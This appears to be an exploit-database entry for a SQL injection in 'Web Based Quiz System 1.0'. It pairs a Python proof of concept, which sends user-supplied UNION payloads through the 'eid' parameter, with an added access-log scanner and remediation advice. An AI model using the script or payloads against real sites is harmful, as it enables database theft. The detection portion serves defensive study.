CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-89 | $500 | High |

Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2021-03-07 |

CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L | 0.02192 | 0.50148 |
```python
'''
# Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
# Date: 04-03-2021
# Exploit Author: Deepak Kumar Bharti
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
PoC made in python by Nano
'''
import requests, sys


def main():
    print("U Need to Set PHPSESSID Before u Continue EDIT CODE")
    siteinput = input('site: ')  ## Takes users input
    req = requests.get(f"{siteinput}/welcome.php")
    ''' Checks if File is there '''
    if req.status_code == 200:
        pass  # Might be Vuln
    else:
        print("NOT VULN")
        sys.exit()  # not Vuln

    while True:
        print("Example Payloads: Union Select 1,database(),database(),4,5-- -")
        sql = input('SQLPAYLOADS: ')
        # Sets the Auth Cookie
        cookies = {
            "PHPSESSID": ""
        }
        # Shit for logs
        header = {
            "upgrade-insecure-requests": "1",
            "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36"
        }
        req1 = requests.get(f"{siteinput}/welcome.php?q=quiz&step=2&eid=60377db362694' {sql}&n=2&t=34", cookies=cookies, headers=header)
        print(req1.text)


main()
```
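A defensive counterpart to the PoC above, as an added example that is not part of the original exploit entry: it scans web-server access-log lines for `welcome.php` requests whose `eid` parameter is not a plain identifier. It assumes combined-format logs and that legitimate `eid` values are 13-character hex strings like the one in the PoC request; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate eid values look like the one in the PoC request
# (60377db362694), i.e. a 13-character lowercase hex identifier.
EID_OK = re.compile(r"[0-9a-f]{13}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_eid(log_line):
    """Return the decoded eid value if it deviates from the expected format, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/welcome.php"):
        return None
    # parse_qs percent-decodes values; keep_blank_values so an empty eid is checked too.
    for value in parse_qs(url.query, keep_blank_values=True).get("eid", []):
        if not EID_OK.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_eid) for every log line with an unexpected eid."""
    return [(n, v) for n, line in enumerate(lines, 1)
            if (v := suspicious_eid(line)) is not None]


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Mar/2021:10:00:01 +0000] "GET /welcome.php?q=quiz&step=2'
    '&eid=60377db362694&n=2&t=34 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Mar/2021:10:00:07 +0000] "GET /welcome.php?q=quiz&step=2'
    '&eid=60377db362694%27%20Union%20Select%201,database(),database(),4,5--%20-'
    '&n=2&t=34 HTTP/1.1" 200 5344',
    '203.0.113.5 - - [07/Mar/2021:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: unexpected eid value {value!r}")
```

The same allow-list check, applied server-side before `eid` reaches the database and combined with a parameterized query, removes the injection point (CWE-89) rather than only detecting its use.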